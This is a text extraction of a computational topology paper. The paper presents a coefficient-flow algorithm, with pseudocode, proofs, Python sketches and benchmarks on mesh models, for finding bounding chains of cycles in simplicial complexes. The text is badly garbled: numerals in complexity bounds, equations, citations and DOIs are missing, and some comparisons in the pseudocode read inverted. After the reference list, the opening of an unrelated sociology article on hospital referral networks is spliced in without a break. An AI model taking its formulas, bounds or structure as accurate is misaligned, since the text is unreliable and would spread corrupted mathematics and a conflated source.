$\partial[p_{0:k}] = [p_{1:k}] + \left(\sum_{i=1}^{k-1} (-1)^i\, [p_{0:i-1}, p_{i+1:k}]\right) + (-1)^k\, [p_{0:k-1}].$

the above sum can be interpreted as a "union with orientation", where multiplying by 1 or −1 is the identity or a reversal of orientation, respectively. note that if p_{0:k} are affinely independent, then the boundary of the convex hull does indeed correspond to the union of the convex hulls of all subsets of {p_{0:k}} with k distinct points. for example, the boundary of the simplex [p_0, p_1, p_2] is given by [p_1, p_2] − [p_0, p_2] + [p_0, p_1]; applying the only possible orientation-reversing permutation to [p_0, p_2] gives [p_1, p_2] + [p_2, p_0] + [p_0, p_1]. this corresponds to the union of the edges that form the boundary of the triangle [p_0, p_1, p_2], oriented in such a way as to form a closed path.
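the alternating-sign boundary formula above translates directly into code. the following short python sketch (illustrative only, not taken from the paper's implementation) lists the (k−1)-faces of a simplex together with their signs.

```python
# sketch of the simplex boundary operator: the i-th face of [p_0, ..., p_k] is obtained
# by dropping the i-th vertex and enters the boundary with sign (-1)^i.
def boundary(simplex):
    """simplex: list of vertex labels; returns a list of (face, sign) pairs."""
    return [(simplex[:i] + simplex[i + 1:], (-1) ** i) for i in range(len(simplex))]

# the triangle [p0, p1, p2]: boundary is [p1,p2] - [p0,p2] + [p0,p1], as in the example above
print(boundary(["p0", "p1", "p2"]))
# [(['p1', 'p2'], 1), (['p0', 'p2'], -1), (['p0', 'p1'], 1)]
```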
definition. a set of points p ⊆ ℝ^n and a set of simplices t = {σ_{0:n}} defines a geometric simplicial complex s = (p,t) if any finite subset of a simplex in t is also in t, and, given any two simplices [p_{0:k}], [q_{0:k′}] ∈ t, the intersection of the convex hulls [p_{0:k}] ∩ [q_{0:k′}] is the convex hull of {p_{0:k}} ∩ {q_{0:k′}} and is also a simplex in t. for any d we define the d-skeleton of t by t_d = {σ ∈ t | dim σ ≤ d} and the d-th level as t^(d) = {σ ∈ t | dim σ = d}.

given two simplices σ, τ we write τ ⋖ σ if τ ⊂ σ and dim τ = dim σ − 1, which can be read as "τ is a top-dimensional face of σ". note that ⋖ is not transitive, and therefore it is not a preorder. its transitive closure τ < σ, however, defines a preorder. we can thus read τ < σ as "τ is contained in the boundary of σ" or simply "τ is a face of σ". we say that a simplicial complex s = (p,t) has dimension d if d is the largest integer such that t^(d) ≠ ∅.

definition. a d-dimensional simplicial complex s = (p,t) is called a d-manifold-like simplicial complex if
• for every τ ∈ t_{d−1} there exists some σ ∈ t^(d) such that σ > τ, and
• if dim τ = d−1 then there are at most two σ ∈ t^(d) satisfying σ > τ.

note that a triangulation of a d-manifold is a manifold-like simplicial complex; however, the definition also includes other spaces like triangulations of manifolds with boundary and the pinched torus.

algebraic description

we will focus on finite geometric simplicial complexes s = (p,t) (where |p|, |t| < ∞). since such an s has a finite number of simplices, we can define for each level k ≤ dim(s) an injective function ι_k : t^(k) → ℕ such that ι_k(t^(k)) = {1, ..., |t^(k)|}; we call ι_k an enumeration of t^(k). from this we define the chain complex associated with s.

definition. given a simplicial complex s = (p,t), the chain complex associated with s is defined as the pair {(c_k(s), d_k)}_{k=0}^{+∞}, where the c_k(s) are vector spaces defined as c_k(s) = ℝ^{|t^(k)|} and the d_k are linear maps d_k : c_k(s) → c_{k−1}(s) defined on basis elements as

$d_k(e_i) = \sum_{\tau \in \partial(\iota_k^{-1}(i))} o(i,\tau)\, e_{\iota_{k-1}(\tau)},$

where o(i,τ) is the orientation of τ induced by the boundary of σ = ι_k^{-1}(i). it can be shown that d_k ∘ d_{k+1} = 0, which allows us to define, for each k, the k-th homology group of s as h_k(s) = ker(d_k)/im(d_{k+1}). by a slight abuse of notation, for a simplicial complex s = (p,t) and a k-chain c, we write c_σ for the coefficient corresponding to σ, e_σ for the corresponding basis element, and d for the appropriate boundary map whenever these are clear from their contexts. we call the elements p ∈ c_k(s) such that dp = 0 k-cycles. two k-cycles p, p′ are said to be homologous if there exists a chain c ∈ c_{k+1}(s) such that dc = p − p′, so that p − p′ is called a k-boundary. this defines k-homology as the group of k-cycles quotiented by the homology relation.

problem description and contribution

we are interested in the bounding chain problem, that is, given a cycle p, we want to decide whether or not p is a boundary, and in case it is, provide a witness in the form of a chain c such that ∂c = p; we call c a bounding chain of p.
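to make these objects concrete, the sketch below (an illustrative python example, not the paper's code) assembles the top boundary matrix d_n from an enumeration of the (n−1)- and n-faces and solves ∂c = p in the least-squares sense, which is essentially the linear-system baseline mentioned in the introduction; the dictionary-based enumeration is an assumption about how the complex is stored.

```python
# build the sparse top-dimensional boundary matrix and solve d_n c = p by least squares.
import numpy as np
from scipy.sparse import lil_matrix
from scipy.sparse.linalg import lsqr

def boundary_matrix(top_simplices, face_index):
    """top_simplices: list of n-simplices (sorted vertex lists);
       face_index: dict mapping each (n-1)-face (tuple) to its row, i.e. an enumeration."""
    D = lil_matrix((len(face_index), len(top_simplices)))
    for j, sigma in enumerate(top_simplices):
        for i in range(len(sigma)):
            face = tuple(sigma[:i] + sigma[i + 1:])
            D[face_index[face], j] = (-1) ** i    # orientation o(j, face)
    return D.tocsr()

# toy 2-complex: two triangles glued along the edge (1, 2)
tris = [[0, 1, 2], [1, 2, 3]]
edges = {(0, 1): 0, (0, 2): 1, (1, 2): 2, (1, 3): 3, (2, 3): 4}
D = boundary_matrix(tris, edges)
p = D @ np.array([1.0, -1.0])        # a boundary by construction
c = lsqr(D, p)[0]                    # recovers a bounding chain (here [1, -1])
print(np.round(c, 6))
```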
related work in chambers & wang ( ) the authors address the problem of computing the area of a homotopy between two paths on -dimensional manifolds, which can be seen as a generalization of the same problem, for -dimensional meshes via the hurewicz map (hatcher, ). in chambers & vejdemo-johansson ( ) the authors provide a method for calculating the minimum area bounding chain of a -cycle on a d mesh, that is the solution to the problem argmincarea(c)=p, where ∂c =p ( ) and p is a -chain on a given simplicial complex. this is done by using optimization methods for solving the associated linear system. these methods however have time complexity lower-bounded by matrix multiplication time which is in �(min(n,m) ) where n,m are the number of rows and columns of the boundary matrix (davie & stothers, ). this complexity quickly becomes prohibitive when we handle large complexes, such as one might find when dealing with meshes constructed from large pointclouds. more recently, in rodríguez et al. ( ) the authors proposed a method for computing bounding chains of -cycles in -dimensional complexes, using a spanning tree of the dual graph of the complex. in dey, hirani & krishnamoorthy ( ) the authors address the related problem of efficiently computing an optimal cycle p′ which is homologous to a given cycle p (with z coefficients). this is a significant result given that in chambers, erickson & nayyeri ( ) the authors proved that this cannot be done efficiently (i.e., in polynomial time) for -cycles using z coefficients, a result that was extended in chen & freedman ( ) to cycles of any dimension. methodology for any simplicial complex s, and any pair of simplices σ,τ ∈s such that, τ cσ , we define the index of τ with respect to σ as 〈τ,∂σ〉=〈eτ,deσ〉 (forman, ). note that the index corresponds to the orientation induced by the boundary of σ on τ and can be computed in o(d) time by the following algorithm: carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. index(σ,τ): param: σ - k-simplex represented as a sorted list of indices of points. param: τ - (k− )-face of σ represented as a sorted list of indices. : for each i← ...dimτ : : if τi =σi: : orientation←(− )i : break loop : return orientation by inspecting the main loop we can see that index(σ,τ) returns (− )i where i is the index of the first element at which σ and τ differ. we assume τ is a top dimensional face of σ , so if σ =[s :d], then by definition τ =[s :(i− ),s(i+ ):d] for some i, and so the coefficient of τ in the boundary of σ is (− )i as per the definition of the boundary operator. this is also the index of the first element at which τ and σ differ, since they are represented as sorted lists of indices. the following is an intuitive result, that will be the basis for the coefficient-flow algorithm that we will present in the sequel. proposition . let s be a manifold-like simplicial complex, let c be an n-chain on s and p its boundary. then for any pair of n-simplices σ =σ ′ with ∂σ∩∂σ ′={τ}we have: cσ =〈τ,∂σ〉(pτ −〈τ,∂σ ′ 〉cσ ′). proof. if we expand the equation ∂c =p, we get pτ = ∑ τcω〈eτ,d(cωeω)〉, recall that by definition d(cωeω)= ∑ νcω〈ν,∂ω〉cωeν; and so we get pτ = ∑ τcω〈τ,∂ω〉cωeτ . now since s is a manifold-like simplicial complex and τ =∂σ∩∂σ ′, then σ,σ ′ are the only cofaces of τ , and hence we have: pτ =〈τ,∂σ〉cσ +〈τ,∂σ ′ 〉cσ ′ which can be reorganized to cσ = pτ−〈τ,∂σ ′〉cσ′ 〈τ,∂σ〉 . 
finally, since the index 〈τ,∂σ〉 is either or − , we can rewrite this equation as: cσ =〈τ,∂σ〉(pτ −〈τ,∂σ ′ 〉cσ ′) next, we present an algorithm to calculate a bounding chain for a (n− )-cycle in an n-manifold-like simplicial complex. the algorithm proceeds by checking every top- dimensional face σ , and calculating the value of the chain on adjacent top-dimensional faces, using proposition . in order to prove that the coefficient-flow algorithm solves problem ( ), will use the fact that we can see the algorithm as a traversal of the dual graph. definition . given an n-dimensional simplicial complex s, recall that the dual graph is a graph g(s)=(v,e) with set of vertices v =s(n) and (σ,σ ′)∈e if dim(σ∩σ ′)=n− . proposition . if s is a manifold-like simplicial complex, where g(s) is connected, and p is an (n− )-boundary, then coefficient- flow(p,σ,v) returns a bounding chain c of p satisfying cσ =v, if such a boundary exists. furthermore, the main loop ( – ) is executed at most o(|s(n− )|) times. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. coefficient-flow(p,σ ,v ): param: p — an n− boundary of the simplicial complex s param: σ — an n–simplex from where the calculation will start param: v — the value to assign the bounding chain at sigma return: c — a bounding chain of p satisfying cσ =v (if it exists) : initialize c and mark every n- and (n− )-cell of s as not seen. : initialize an empty queue q : let τ ∈∂σ : enqueue (σ ,τ ,v ) into q. : while q is non-empty: : (σ,τ,v)←pop first element from q : if σ has been marked seen: : if v =cσ : the problem has no solution : else: : if τ has been marked seen: skip : cσ ←v : mark τ and σ as seen : for each τ ′∈∂σ : : if σ is the only coface of τ ′: : mark τ ′ as seen : if pτ ′ =〈∂σ,τ ′〉v : the problem has no solution : else: : if τ ′ has not been marked as seen: : σ ′←other coface of τ ′ : v′←〈∂σ ′,τ〉(pτ −〈∂σ,τ〉v) : enqueue (σ ′,τ ′,v′) into q : return c proof. we start by proving the bound on the number of executions of the main loop. this is guaranteed by the fact that the loop is executed while the queue is non-empty, and a triple (σ,τ,v) can only be inserted in line ( ) if τ has not been marked as seen. furthermore, since τ has at most two cofaces, say, σ,σ ′, we can only enqueue τ if we are analyzing σ or σ ′ and so for each τ , at most two elements are placed in the queue, and hence the main loop gets executed at most |s(n− )| times. to prove correctness of the algorithm, we have to prove that it outputs an error if and only if the problem has no solution, and otherwise it outputs a bounding chain of p with cσ =v. first, we note that if a face σ is marked as seen, the value of cσ can never be reassigned. this is because the program branches on whether or not σ has been marked as seen, and cσ can only be assigned on line ( ) which is bypassed if σ has been previously marked as seen. from this fact we conclude that cσ =v as it is assigned on line ( ) and σ is marked as seen in the first iteration of the main loop. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. second, note that there is an edge between two n-faces in the dual graph if and only if they share an (n− )-face. this implies that as we execute the algorithm, analyze a new n-face σ and successfully add the other cofaces of elements of the boundary of σ , we add the vertices neighboring σ in the dual graph. 
since the dual graph is connected all of the nodes in the graph are eventually added, and hence all of the n-faces are analyzed. third, we note that for any pair (τ,σ) with dimσ =n and τ c σ , either σ is the only coface of τ , or τ has another coface, σ ′. in the first case, if pτ = cσ〈τ,∂σ〉 an error is detected on line ( ). in the second case, assuming that the triple (σ,τ,v) is enqueued before (σ ′,τ,v′) we have v′=〈∂σ ′,τ〉(pτ −〈∂,σ〉v) as is assigned in line ( ) then (dc)τ =〈∂σ,τ〉v+〈∂σ ′ ,τ〉v′ =〈∂σ,τ〉v+〈∂σ ′,τ〉(〈∂σ ′,τ〉(pτ −〈∂,σ〉v)) =〈∂σ,τ〉v+pτ −〈∂σ,τ〉v =pτ. finally, since upon the successful return of the algorithm, this equation must be satisfied by every pair τ cσ , it must be the case that dc =p. if this is not the case, then there will be an error in line ( ) and the algorithm will abort. � note that the connectivity condition can be removed if we instead require a value for one cell in each connected component of the graph g(s), and throw an error in case there is an (n− )-simplex τ with no cofaces, such that pτ = . furthermore, the algorithm can be easily parallelized using a thread pool that iteratively processes elements from the queue. finally, in the case where it is known that s has an (n− )-face τ with a single coface, we do not need to specify σ or v in coefficient-flow, and instead use the fact that we know the relationship between the coefficient pτ and that of its coface in a bounding chain c of p, i.e., pτ =〈∂σ,τ〉cσ . this proves corollary . bounding-chain(p): param: p — an n− boundary of the simplicial complex s return: c — a bounding chain of p : for each τ ∈sn− : : if τ has a single coface: : σ ← the coface of τ : v ←〈∂σ,τ〉pτ : break loop : c ←coefficient-flow(p,σ,v) : returnc corollary . if s is a connected n-manifold-like simplicial complex with a connected dual graph, and has an (n− )-face with a single coface, then given an (n− )-cycle p on s, bounding-chain(p) returns a bounding chain of p if one exists. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. implementation details we will now discuss some of the choices made in our implementation of the coefficient- flow algorithm (https://www.github.com/crvs/coeff-flow). before we can address the problem of considering chains on a simplicial complex we first need to have a model of a simplicial complex. for this, we decided to use a simplex tree model (boissonnat & maria, ) provided by the gudhi library (the gudhi project, ) as it provides a compact representation of a simplicial complex (the number of nodes in the tree is in bijection with the number of simplices) which allows us to quickly get the enumeration of a given simplex σ . indeed, the complexity of calculating ιk(σ) is in o(dimσ). it is important to compute the enumeration quickly because in our implementation of coefficient-flow we use arrays of booleans to keep track of which faces of the simplicial complex have been seen before, as well as numerical arrays to store the coefficients of the cycle and its bounding chain, which need to be consulted at every iteration of the loop. however, finding the cofaces of the simplicial complex is not as easy in a simplex tree, since, if σ =[pi :ik], this would require to search every child of the root node of the tree that has an index smaller than i , followed by every child of the node associated with pi and so on, which in the worst case scenario is in o(dimσ|s( )|). thus we need to adopt a different method. 
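before describing that data structure, the following python sketch shows the whole traversal in miniature. it is not the released implementation (which builds on the gudhi simplex tree): it simply precomputes a dictionary from every codimension-1 face to its cofaces, which is the role the hasse diagram described next plays in our implementation, and, for brevity, it verifies ∂c = p once at the end instead of detecting inconsistencies during the traversal as the pseudocode above does.

```python
# A runnable sketch of coefficient-flow over a precomputed coface map.
from collections import defaultdict, deque

def index(sigma, tau):
    """Orientation <tau, d(sigma)>: (-1)**i, where i is the first position at which
    the sorted tuples sigma and tau differ (the index algorithm above)."""
    for i in range(len(tau)):
        if tau[i] != sigma[i]:
            return (-1) ** i
    return (-1) ** len(tau)                  # tau is sigma with its last vertex dropped

def facets(sigma):
    """Codimension-1 faces of a simplex given as a sorted vertex tuple."""
    return [sigma[:i] + sigma[i + 1:] for i in range(len(sigma))]

def coface_map(top_simplices):
    """Dictionary sending each (n-1)-face to the list of n-simplices it bounds."""
    cofaces = defaultdict(list)
    for sigma in top_simplices:
        for tau in facets(sigma):
            cofaces[tau].append(sigma)
    return cofaces

def coefficient_flow(top_simplices, p, sigma0, v0):
    """Find an n-chain c with boundary p and c[sigma0] = v0, or return None.
    top_simplices: n-simplices of a manifold-like complex, as sorted vertex tuples.
    p: dict from (n-1)-faces to coefficients; missing keys mean 0."""
    cofaces = coface_map(top_simplices)
    c, queue = {sigma0: v0}, deque([sigma0])
    while queue:                              # breadth-first walk of the dual graph
        sigma = queue.popleft()
        for tau in facets(sigma):
            others = [s for s in cofaces[tau] if s != sigma]
            if not others:
                continue                      # tau has a single coface
            sigma2 = others[0]                # manifold-like: at most one other coface
            if sigma2 not in c:
                # propagate across tau using the identity from the proposition above
                c[sigma2] = index(sigma2, tau) * (p.get(tau, 0) - index(sigma, tau) * c[sigma])
                queue.append(sigma2)
    # Verify d(c) = p at the end; report failure if the cycle has no bounding chain.
    dc = defaultdict(float)
    for sigma, v in c.items():
        for tau in facets(sigma):
            dc[tau] += index(sigma, tau) * v
    ok = all(abs(dc.get(t, 0.0) - p.get(t, 0.0)) < 1e-9 for t in set(dc) | set(p))
    return c if ok else None
```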
for this, we keep a hasse diagram of the face relation which comprises a directed graph whose vertices are nodes in the simplex tree and has edges from each face to its codimension- cofaces (see for instance di battista & tamassia ( )) for more details of this data-structure). this allows us to find the codimension- cofaces of a simplex of s in o( ) with a space overhead in o(|s|). with these elements in place, we can analyze the complexity of our implementation of the coefficient-flow algorithm in full: lemma . the coefficient-flow algorithm using a simplex tree and a hasse diagram has computational (time) complexity o(d |s(d− )|) where d=dims. proof. in proposition we saw that the coefficient-flow algorithm executes the main loop at most o(|s(d)|) times, so we only need to measure the complexity of the main loop, in order to obtain its time complexity. this can be done by checking which are the costly steps: • in lines ( ) and ( ) checking whether a face has been marked as seen requires first computing ιk(τ) which, as we stated above, has time complexity o(k), with k≤d. • in line ( ), computing the faces of a simplex σ requires o(dimσ ) steps, and yields a list of size dimσ , hence the inner loop ( – ) is executed dimσ times, where dimσ =d, for each element placed in the queue. • the loop ( – ) requires once again, computing ι(τ ′), and 〈∂σ,τ〉, each of these operations, as we explained before, carries a time complexity o(d). • all other operations have complexity o( ). composing these elements, the total complexity of one iteration of the main loop is o(max{d,d ,d ·d}) = o(d ), which yields a final complexity for the proposed implementation, of o(d |s(d− )|). � carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.github.com/crvs/coeff-flow http://dx.doi.org/ . /peerj-cs. we use the least squares conjugate gradient descent method to solve the system. figure examples of bounding chains: the edges in blue form cycles in the mesh, and the faces in red form the corresponding bounding chain as computed by the coefficient-flow algorithm. in (a) we depict the mesh of the stanford bunny the stanford d scanning repository ( ) and in (b) we show the mesh of a bee smithsonian ( ). in both these meshes we depict examples of bounding chains, where the edges in blue form cycles, and the faces in red form the corresponding bounding chain as computed by the coefficient-flow algorithm. in both cases the depicted bounding chains correspond to the op- timal bounding chains (w.r.t. the number of faces), these can by obtained by choosing σ and v so as to yield the desired chain. in this case, since the two complexes are topological spheres and the cycles are sim- ple cycles (meaning they are connected and do not self-intersect), there are only two possible bounding chains that do not include all the faces of the complex, which can be obtained by running the algorithm three times, choosing σ arbitrarily, and setting v to be ,n or−n where n = maxτ∈s( )|pτ|. in the case of non-simple cycles, more alternatives would exist. full-size doi: . /peerjcs. /fig- example runs and tests in fig. we provide an example of the output of the coefficient-flow algorithm for the mesh of the stanford bunny (the stanford d scanning repository, ) and the eulaema meriana bee model from the smithsonian d model library (smithsonian, ). 
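on a toy complex the sketch above can be checked directly, and the same restricted problem can be handed to a sparse least-squares solver, which is the role played by eigen's least-squares conjugate gradient in the comparison reported next; here scipy's lsqr stands in for it. the snippet reuses the helper functions from the previous sketch.

```python
import numpy as np
from scipy.sparse import lil_matrix
from scipy.sparse.linalg import lsqr

top = [(0, 1, 2), (0, 2, 3)]                         # a square split into two triangles
p = {(0, 1): 1, (1, 2): 1, (2, 3): 1, (0, 3): -1}    # its outer boundary, a 1-cycle

print(coefficient_flow(top, p, sigma0=(0, 1, 2), v0=1.0))
# -> {(0, 1, 2): 1.0, (0, 2, 3): 1.0}

# The same problem posed as a sparse linear system d2 @ x = p.
edges = sorted({tau for t in top for tau in facets(t)})
d2 = lil_matrix((len(edges), len(top)))
for j, t in enumerate(top):
    for tau in facets(t):
        d2[edges.index(tau), j] = index(t, tau)
x = lsqr(d2.tocsr(), np.array([p.get(e, 0) for e in edges]))[0]
print(np.round(x, 6))                                # -> [1. 1.]
```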
for comparison, we performed the same experiments using the eigen linear algebra library (eigen, ) to solve the underlying linear system, and summarized the results in table . this allowed us to see that even though both approaches remain feasible with relatively large meshes, solving the linear system consistently underperforms using the coefficient-flow algorithm. even though coefficient-flow is expected to outperform a linear system solver (an exact solution to a linear system has �(n ) time complexity), we wanted to test it against an approximate sparse system solver. such solvers (e.g., conjugate gradient descent (gloub & van loan, )) rely on iterative matrix products, which in the case of boundary matrices of dimension d can be performed in o((d+ )n) where n is the number of d-dimensional simplices, placing the complexity of the method in �((d+ )n). in order to observe the difference in complexity class we performed randomized tests on both implementations. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. since boundary matrices are naturally sparse, and we are computing an approximate solution, the complexity can be improved beyond the aforementioned �(n ). table timing for computation of bounding chains using coefficient-flow, and using eigen in several meshes. ‘‘bunny’’ and ‘‘bee (sample)/bee (full)’’ refer to the meshes in figs. a and b, respec- tively. the mesh ‘‘bee (full)’’ is the one obtained from smithsonian ( ), whereas the one labeled ‘‘bee (sample)’’ is a sub-sampled version of it. mesh faces edges vertices eigen coefficient-flow bunny . (s) . (s) bee (sample) . (s) . (s) bee (full) . (s) . (s) figure running times for a calculating the bounding chain of a cycle as a function of the number of edges (a), and log–log plot of the same data (b). full-size doi: . /peerjcs. /fig- in this scenario we made a mesh on a unit square from a random sample. by varying the number of points sampled from the square, we effectively varied the resolution of the mesh. finally, at each resolution level we snapped a cycle onto the mesh, and computed its bounding chain using both coefficient-flow and by solving the sparse linear system as before. we plotted the timings in fig. from where we can experimentally observe the difference in the complexity class between our algorithm and the solution to the sparse linear system. furthermore by analyzing the log-log plot in fig. b, we can confirm our complexity estimates by analyzing the slope of the lines where the samples are distributed, i.e., solving the sparse linear system is approximately o(n . ) complexity, whereas coefficient-flow displays linear complexity. conclusion and future work while the problem of finding a bounding chain for a given cycle in a simplicial complex remains a challenging one for large complexes, we showed that this problem can be solved efficiently for codimension- boundaries. we implemented and tested our algorithm and have provided complexity bounds for its run-time. however, this leaves open the question of finding bounding chains for boundaries of higher codimension, for which solving a large sparse linear system is still, to the best of our knowledge, the only feasible approach, save for codimension cycles in dimension carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. (rodríguez et al., ). 
in the future we would like to generalize our algorithm to be able to work with cobounding cochains (i.e., in cohomology), as well as considering the optimality question (i.e., finding the minimal bounding chain w.r.t. some cost function). additional information and declarations funding this work has been supported by the knut and alice wallenberg foundation and the swedish research council. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: knut and alice wallenberg foundation. swedish research council. competing interests the authors declare there are no competing interests. author contributions • j. frederico carvalho conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • mikael vejdemo-johansson, danica kragic and florian t. pokorny authored or reviewed drafts of the paper. data availability the following information was supplied regarding data availability: github: https://www.github.com/crvs/coeff-flow. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references boissonnat j-d, maria c. . the simplex tree: an efficient data structure for general simplicial complexes. algorithmica ( ): – . chambers ew, erickson j, nayyeri a. . minimum cuts and shortest homologous cycles. in: symposium on computational geometry doi . / . . chambers ew, vejdemo-johansson m. . computing minimum area ho- mologies. in: computer graphics forum, vol. . wiley online library, – doi . /cgf. . carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.github.com/crvs/coeff-flow http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / . http://dx.doi.org/ . /cgf. http://dx.doi.org/ . /peerj-cs. chambers ew, wang y. . measuring similarity between curves on -manifolds via homotopy area. socg ’ . in: proceeding of the twenty-ninth annual symposium on computational geometry. new york: acm, – doi . / . . chen c, freedman d. . hardness results for homology localization. discrete and computational geometry ( ): – doi . /s - - - . davie am, stothers aj. . improved bound for complexity of matrix multiplication. proceedings of the royal society of edinburgh section a: mathematics ( ): – doi . /s . dey tk, hirani an, krishnamoorthy b. . optimal homologous cycles, total uni- modularity, and linear programming. siam journal on computing ( ): – doi . / . di battista g, tamassia r. . algorithms for plane representations of acyclic digraphs. theoretical computer science ( ) doi . / - ( ) - . edelsbrunner h, harer j. . computational topology: an introduction. providence: american mathematical soc. edelsbrunner h, letscher d, zomorodian a. . topological persistence and simplification. discrete & computational geometry ( ): – . eigen. . version . . . available at http://eigen.tuxfamily.org/ . forman r. . morse theory for cell complexes. advances in mathematics ( ): – doi . /aima. . . gloub gh, van loan cf. . matrix computations. rd edition. london: johns hopkins university press. hatcher a. . algebraic topology. nd edition. cambridge: cambridge university press. pokorny ft, hawasly m, ramamoorthy s. . 
topological trajectory classification with filtrations of simplicial complexes and persistent homology. international journal of robotics research ( – ): – doi . / . rodríguez aa, bertolazzi e, ghiloni r, specogna r. . efficient construction of - chains with a prescribed boundary. journal of numerical analysis ( ): – doi . / m . smithsonian x. . d: eulaema meriana bee, smithsonian gardens. available at https:// d.si.edu. the gudhi project. . gudhi user and reference manual. gudhi editorial board available at http://gudhi.gforge.inria.fr/doc/latest/ . the stanford d scanning repository. . available at https://graphics.stanford.edu/ data/ dscanrep/ . carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s http://dx.doi.org/ . / http://dx.doi.org/ . / - ( ) - http://eigen.tuxfamily.org/ http://dx.doi.org/ . /aima. . http://dx.doi.org/ . / http://dx.doi.org/ . / m https:// d.si.edu http://gudhi.gforge.inria.fr/doc/latest/ https://graphics.stanford.edu/data/ dscanrep/ https://graphics.stanford.edu/data/ dscanrep/ http://dx.doi.org/ . /peerj-cs. © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /). connections issue | vol. article | doi: . /connections- . clients’ outcomes from providers’ networks: the role of relational exclusivity and complementary capabilities denis trapido, ,* francesca pallotti and alessandro lomi university of washington bothell, bothell, washington. university of greenwich, london, uk. university of italian switzerland, switzerland and university of exeter, england, uk. *e-mail: dtrapido@uw.edu this article was accepted by prof david schaefer, action editor. abstract organizations have leeway in how much they employ their network relations to the benefit of their clients. when do they do so more rather than less? relying on research on trust and knowledge absorption, the authors suggest that providers’ network relations generate better outcomes for their clients when these relations are concentrated in a limited, exclusive set of partners. the authors argue that providers’ relational exclusivity benefits clients because it facilitates the awareness and use of partners’ complementary client service capabilities. an analysis of a regional network of patient referrals among hospitals supported this argument. the study highlights the role of interorganizational partnership networks in activating client service capabilities and stimulates further inquiry into providers’ network features that benefit the users of their services. keywords interorganizational networks, client benefits, health care. the implications of interorganizational collaboration networks for the benefit of the users of organizations’ offerings − variously called consumers, clients, cus- tomers or patrons − are puzzlingly variable. clients may enjoy substantial quality and price benefits from providers’ collaboration networks (brueckner and whalen, ; morrish and hamilton, ) . yet network ties among providers may also disadvantage their clients by limiting the clients’ ability to choose between independent providers or to judge the quality of the offerings (baker and faulkner, ; ingram and roberts, ). neutral scenarios, when providers’ networks do not affect the benefits of the users of their services, are also possible. why such different outcomes? what determines the extent to which providers’ network relations benefit their clients? 
organizational networks research has given this question remarkably short shrift. studies have examined the benefits of provider networks for buyer firms (uzzi, ; uzzi and gillespie, ; uzzi and lancaster, ), but not for individual end customers. studies in other disciplines that touched upon the question have generally converged on the importance of providers’ motivation to benefit their clients. some studies implied that providers may jointly benefit clients when they are intrinsically motivated to collaborate in the clients’ interest (bunderson and thompson, ; leana et al., ; wrzesniewski et al., ). others noted a similar motivating effect of external pressures to collaborate on improving service recipients’ outcomes, including institutional pressures by professional associations or accreditations agencies (durand and mcguire, ; ruef and scott, ) and competitive pressures forcing providers into alliances whose efficiency benefits spill over to their clients (brueckner and whalen, ; morrish and hamilton, ). going forward, we use the term “provider” to denote any organization that provides goods or services. because we develop and test an argument that specifically applies to providers and users of professional services, we will refer to users of providers’ offerings as “clients” or “service recipients.” we will use more general terms, such as “customer” or “consumer,” when they feature in arguments that we reference. clients’ outcomes from providers’ networks while the role of providers’ motivation is undeniable, motivation cannot fully account for clients’ benefits from providers’ network relations. even highly motivated providers can put their networks in the service of their clients only to the extent that their network relations improve their capability to serve clients (wuyts et al., ). a full account of service users’ benefits from providers’ networks is not possible without understanding when and how providers’ networks unlock this capability. our study takes an early step toward such understanding. we build on the fundamental insight of organizational network theory that organizational outcomes depend on features of interorganizational partnership networks (borgatti and halgin, ; powell et al., ; uzzi , ). we extend the notion that features of these networks enable organizational outcomes, arguing that network features may also enable client outcomes. building on theories of trust and knowledge absorption, we argue that relational exclusivity is a feature of providers’ ego networks that improves their capability to benefit clients: providers’ partnerships produce better outcomes for their clients when they connect to their partnership network through selected, exclusive relations. we further argue that relational exclusivity benefits clients by helping providers combine client service capabilities; its effect is, therefore, more pronounced to the extent that the partners’ client service capabilities are complementary. we examine our argument in a regional patient referral network comprising hospitals in italy. we follow the lead of previous studies that used data from health care to test theoretical arguments generalizable across industries (barrera and van de bunt, ; drange, ) and patient outcome data in particular to operationalize client benefit (e.g. dibenigno and kellogg, ; provan and milward, ; schoonhoven, ). specifically, we test the effects of referral network features on the benefits that patients derive from being routed toward providers of better care. 
our research contributes to organizational network theory by identifying a provider network feature that enables better client outcomes. we transcend the motivational explanations of client outcomes from providers’ network relations, showing that client outcomes depend on the extent to which these relations activate providers’ capability to serve client needs. the study challenges organizational network theory to match the rich literature on interorganizational network features that benefit providers with an equally rich understanding of network features that benefit clients. we also offer practical recommendations to policymakers on improving client outcomes from provider networks. theory and hypotheses motivational determinants of client outcomes from provider networks studies of determinants of client benefits from providers’ network relations are spread across various literatures and have been in minimal dialogue with each other. the common feature of these diverse studies is the emphasis on providers’ motivation. in different ways, they suggested that providers are motivated to use their network relations in the interest of the client insofar as the providers’ rewards are interdependent with their clients’ outcomes. the interdependence of providers’ and customers’ outcomes is most obvious when it is inherent in the nature of the transaction. for example, in the venture capital industry, the investing firms’ collaboration ties simultaneously benefit the investing firms and their investment targets (hochberg et al., ; ozmel et al., ). similar interdependence may exist due to contractual arrangements, such as contingent fee contracts in legal and financial services, which explicitly make providers’ rewards dependent on clients’ outcomes (gravelle and waterson, ; rau, ). 